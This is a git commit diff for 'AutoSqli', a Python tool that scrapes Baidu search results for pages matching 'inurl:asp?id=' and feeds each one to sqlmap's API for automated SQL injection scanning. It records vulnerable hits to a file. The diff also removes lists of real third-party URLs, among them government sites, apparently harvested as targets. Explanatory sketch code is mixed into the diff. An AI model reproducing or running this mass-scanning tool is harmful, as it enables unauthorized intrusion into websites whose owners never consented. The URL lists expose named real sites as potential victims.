happy birthday KB

This commit is contained in:
jingbo-you
2016-08-02 14:56:15 +08:00
parent 84a098efbb
commit 4d9755bf5e
9 changed files with 107 additions and 78 deletions

.gitignore vendored

@@ -1,4 +1,4 @@
*.pyc
.DS_Store
*.log
data/
data/*.*

AutoSqli.py

@@ -1,20 +1,22 @@
#!/usr/bin/python
#-*-coding:utf-8-*-
from __future__ import absolute_import, print_function
import requests
import time
import json
import threading
import Queue
from search.baidu import *
from search import baidu
import logging
from config import LOG, API_URL
class AutoSqli(object):
"""
Interact with the server set up by sqlmapapi, using the sqlmapapi methods.
"""
def __init__(self, server='', target='', data='', referer='', cookie=''):
super(AutoSqli, self).__init__()
self.server = server
@@ -28,17 +30,22 @@ class AutoSqli(object):
self.referer = referer
self.cookie = cookie
self.start_time = time.time()
self.logger = logging.getLogger('app.run')
self.logger.info('Creating an instance of AutoSqli for {0}.'.format(self.target))
def task_new(self):
self.taskid = json.loads(
requests.get(self.server + 'task/new').text)['taskid']
#print 'Created new task: ' + self.taskid
if len(self.taskid) > 0:
return True
return False
try:
self.taskid = json.loads(
requests.get(self.server + 'task/new').text)['taskid']
#print 'Created new task: ' + self.taskid
if len(self.taskid) > 0:
return True
return False
except requests.ConnectionError:
self.logger.error("sqlmapapi.py is not running")
def task_delete(self):
json_kill=requests.get(self.server + 'task/' + self.taskid + '/delete').text
json_kill = requests.get(self.server + 'task/' + self.taskid + '/delete').text
# if json.loads(requests.get(self.server + 'task/' + self.taskid + '/delete').text)['success']:
# #print '[%s] Deleted task' % (self.taskid)
# return True
@@ -46,7 +53,7 @@ class AutoSqli(object):
def scan_start(self):
headers = {'Content-Type': 'application/json'}
print "starting to scan "+ self.target +".................."
self.logger.debug("Starting to scan "+ self.target +"..................")
payload = {'url': self.target}
url = self.server + 'scan/' + self.taskid + '/start'
t = json.loads(
@@ -74,9 +81,10 @@ class AutoSqli(object):
#print 'not injection\t'
pass
else:
f=open('data/injection.txt','a')
f = open('data/injection.txt','a')
f.write(self.target+'\n')
print 'injection \t'
f.close()
self.logger.warning('injection \t')
def option_set(self):
headers = {'Content-Type': 'application/json'}
@@ -134,28 +142,46 @@ class myThread(threading.Thread):
objects=self.q.get()
result=objects.run()
if __name__ == '__main__':
urls=[]
print 'the program starts!'
key='inurl:asp?id='
pages=3
urls=geturl(key,pages)
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--num', default=4, nargs='?', type=int, dest='num', help="Number of threads")
parser.add_argument('-p', '--page', default=3, nargs='?', type=int, dest='page', help="Number of search pages")
parser.add_argument('-d', '--log', default=LOG["filename"], nargs='?', type=str, dest='log', help="Path of the debug log file")
args = parser.parse_args()
logger = logging.getLogger('app')
logger.setLevel(LOG["level"])
fh = logging.FileHandler(args.log)
fh.setLevel(LOG["level"])
formatter = logging.Formatter(LOG['format'], LOG["datefmt"])
fh.setFormatter(formatter)
sh = logging.StreamHandler()
sh.setLevel(LOG["level"])
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
urls = []
logger.info('the program starts!')
pages = args.page
key = 'inurl:asp?id='
urls = baidu.geturl(key, pages)
#print urls
workQueue=Queue.Queue()
workQueue = Queue.Queue()
for tar in urls:
s = AutoSqli('http://127.0.0.1:8775', tar)
s = AutoSqli(API_URL, tar)
workQueue.put(s)
threads = []
nloops = range(4) #thread count
nloops = range(args.num) #thread count
for i in nloops:
t = myThread(workQueue,i)
t = myThread(workQueue, i)
t.start()
threads.append(t)
for i in nloops:
threads[i].join()
print "Exiting Main Thread"
logger.info("Exiting Main Thread")
if __name__ == '__main__':
main()
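
AutoSqli drives sqlmapapi's REST interface: create a task, start a scan against the target, poll until it terminates, then read the findings and delete the task. A minimal sketch of that request cycle, assuming a server started with `python sqlmapapi.py -s` at API_URL; `scan_once` is a hypothetical helper for illustration, and the scan/<id>/status and scan/<id>/data endpoints come from sqlmapapi's public API:

import json
import time
import requests
from config import API_URL

def scan_once(target):
    # normalize the base url the way AutoSqli expects (trailing slash)
    server = API_URL if API_URL.endswith('/') else API_URL + '/'
    # 1. create a task and remember its id
    taskid = json.loads(requests.get(server + 'task/new').text)['taskid']
    # 2. start a scan against the target url
    headers = {'Content-Type': 'application/json'}
    requests.post(server + 'scan/' + taskid + '/start',
                  data=json.dumps({'url': target}), headers=headers)
    # 3. poll until sqlmap reports the scan as terminated
    while json.loads(requests.get(server + 'scan/' + taskid + '/status').text)['status'] != 'terminated':
        time.sleep(5)  # arbitrary polling interval
    # 4. read the findings, then clean up the task
    data = json.loads(requests.get(server + 'scan/' + taskid + '/data').text)['data']
    requests.get(server + 'task/' + taskid + '/delete')
    return data  # a non-empty list means an injection was found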

README.md

@@ -8,7 +8,7 @@
**Usage:**
- Execute `python sqlmapapi.py -s` in the sqlmap directory to start the API server listening.
- Run AutoSqli.py
- Run AutoSqli.py with `python AutoSqli.py`; the arguments (e.g. `-n` thread count, `-p` search pages) can be listed with `-h`
**Tips:**
* Note that the search keyword is customized in the code: `key='inurl:asp?id='`

config.py Normal file

@@ -0,0 +1,18 @@
#!/usr/bin/env python
# -*- coding=utf-8 -*-
import logging
API_URL = "http://127.0.0.1:8775"
LEVELS = {'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
LOG = {
"level" : LEVELS["debug"],
"filename" : "autosqli.log",
"format" : '[%(asctime)s] %(levelname)-8s %(name)-12s %(message)s',
"datefmt" : '%Y-%m-%d %H:%M:%S'
}
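
config.py only holds constants; main() in AutoSqli.py attaches the file and stream handlers to the 'app' logger once, and module loggers such as 'app.run' and 'app.baidu' inherit them through Python's dotted-name logger hierarchy. A minimal sketch of that propagation ('app.demo' is a made-up child name used only for illustration):

import logging
from config import LOG

# configure the parent logger once, as main() does
app = logging.getLogger('app')
app.setLevel(LOG["level"])
sh = logging.StreamHandler()
sh.setFormatter(logging.Formatter(LOG['format'], LOG["datefmt"]))
app.addHandler(sh)

# a child logger needs no handler of its own: records propagate up to 'app'
logging.getLogger('app.demo').info('formatted by the app handlers')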


@@ -1,6 +0,0 @@
http://www.lamarche.com.tw/production_detail.php?shop_category=64&sn=248
http://www.70jj.com/shop/index.php?shop_id=1
http://www.cosmax.com.hk/products_detail.php?product_id=17
http://www.etron.com/en/products/u3hc_detial.php?Product_ID=5
http://www.fembooks.com.tw/indexstore.php?product_id=5423
http://www.guangzhouflower.net.cn/product.php?pid=12


@@ -1,20 +0,0 @@
http://www.99166.com/zjinfo.asp?id=5
http://www.yh8z.com/Secondary/guding.asp?Id=68&Parent_ID=18&Type_Class=news&GS_Class=22
http://www.gdkszx.com.cn/ksxx/kszc_show.asp?id=2205
http://www.smxs.gov.cn/viewtexti.asp?id=275079&npage=6
http://www.juancheng.gov.cn/wsbs-view.asp?id=9285
http://rc.sz.zj.cn/company.asp?id=4291
http://www.law-lib.com/fxj/fxj.asp?id=940
http://www.kfws.gov.cn/Article_read.asp?id=2289
http://www.zjghtcm.com/new_show.asp?id=1178
http://www.medsci.cn/sci/journal.asp?id=0bc61099
http://www.dylaw.gov.cn/zhongc/web60/classshow.asp?id=51848&classid=15
http://club.kdnet.net/dispbbs.asp?id=11095423&boardid=1
http://people.rednet.cn/PeopleShow.asp?ID=2410432
http://www.dhzsxx.com/ShowNews.asp?id=1591
http://www.chinawutong.com/co/huoyuan_01/index.asp?id=213633
http://news.chinaxinge.com/shownews.asp?id=53866&sjm=49600b363e048e05
http://www.gxxgty.com/news_show.asp?id=1583
http://szb.keq0475.com/Qnews.asp?ID=49506
http://www.cyfy.cn/kssz.asp?id=42
http://www.szkweekly.com/List.asp?ID=54284

Binary file not shown.

search/baidu.py

@@ -1,11 +1,16 @@
#coding: utf-8
from __future__ import unicode_literals
import urllib2
import string
import urllib
import re
import random
import logging
user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
__all__ = ["geturl"]
USER_AGENTS = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0', \
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533+ \
(KHTML, like Gecko) Element Browser 5.0', \
@@ -18,26 +23,31 @@ user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Fire
Chrome/28.0.1468.0 Safari/537.36', \
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; TheWorld)']
def baidu_search(keyword,pn):
p= {'wd': keyword}
res=urllib2.urlopen(("http://www.baidu.com/s?"+urllib.urlencode(p)+"&pn={0}&cl=3&rn=10").format(pn)) #rn is the number of results per page; pn is the offset of the first result shown
html=res.read()
logger = logging.getLogger('app.baidu')
def baidu_search(keyword, pn):
p = {'wd': keyword}
res = urllib2.urlopen(("http://www.baidu.com/s?"+urllib.urlencode(p)+"&pn={0}&cl=3&rn=10").format(pn)) #rn is the number of results per page; pn is the offset of the first result shown
html = res.read()
return html
def getList(regex,text): #deduplicate the fetched urls and store them in a list
def getList(regex, text): #deduplicate the fetched urls and store them in a list
arr = []
res = re.findall(regex, text)
if res:
for r in res:
arr.append(r)
return arr
def getMatch(regex,text): #matching helper function
def getMatch(regex, text): #matching helper function
res = re.findall(regex, text)
if res:
return res[0]
return ''
def is_get(url): #check whether the url is a GET-style link sqlmap can recognize
regex=r'(\S*?)\?.*=.*'
res=re.match(regex,url)
regex = r'(\S*?)\?.*=.*'
res = re.match(regex, url)
if res:
#print res.group(1)
return res.group(1)
@@ -46,12 +56,12 @@ def is_get(url): #check whether the url is a GET-style link sqlmap can recognize
# def Deduplication():
# regex=r'\S'
def geturl(keyword,pages): #fetch urls
def geturl(keyword, pages): #fetch urls
targets = []
hosts=[]
hosts = []
for page in range(0,int(pages)):
pn=(page+1)*10
html = baidu_search(keyword,pn)
pn = (page+1)*10
html = baidu_search(keyword, pn)
content = unicode(html, 'utf-8','ignore')
arrList = getList(u"<div class=\"f13\">(.*)</div>", content) #split the page into result blocks
#print arrList
@@ -61,28 +71,29 @@ def geturl(keyword,pages): #fetch urls
for item in arrList:
regex = u"data-tools='\{\"title\":\"(.*)\",\"url\":\"(.*)\"\}'"
link = getMatch(regex,item)
url=link[1] #get the Baidu-rewritten url
url = link[1] #get the Baidu-rewritten url
try:
domain=urllib2.Request(url)
r=random.randint(0,11)
domain.add_header('User-agent', user_agents[r])
domain.add_header('connection','keep-alive')
response=urllib2.urlopen(domain)
uri=response.geturl() #get the real url
urs=is_get(uri) #is it a conventional GET-style url
domain = urllib2.Request(url)
r = random.randint(0, len(USER_AGENTS) - 1)
domain.add_header('User-agent', USER_AGENTS[r])
domain.add_header('connection', 'keep-alive')
response = urllib2.urlopen(domain)
uri = response.geturl() #get the real url
urs = is_get(uri) #is it a conventional GET-style url
if (uri in targets) or (urs in hosts) :
continue
else:
targets.append(uri)
hosts.append(urs)
f1=open('data/targets.txt','a') #store the url links
f1 = open('data/targets.txt','a') #store the url links
f1.write(uri+'\n')
f1.close()
except:
continue
print "urls have been grabed already!!!"
logger.info("urls have been grabed already!!!")
return targets
if __name__ == '__main__':
pass
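
geturl() chains the helpers above: query Baidu page by page, cut out the result blocks, resolve each rewritten link to its real url, and keep only deduplicated GET-style targets. A short usage sketch (Python 2, to match the urllib2 code; the keyword and page count mirror the defaults in AutoSqli.py, and random.choice is an index-safe alternative to picking a User-Agent with randint):

import random
from search import baidu

urls = baidu.geturl('inurl:asp?id=', 3)  # crawl 3 pages of search results
for u in urls:
    print u

ua = random.choice(baidu.USER_AGENTS)  # can never run past the end of the list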

Binary file not shown.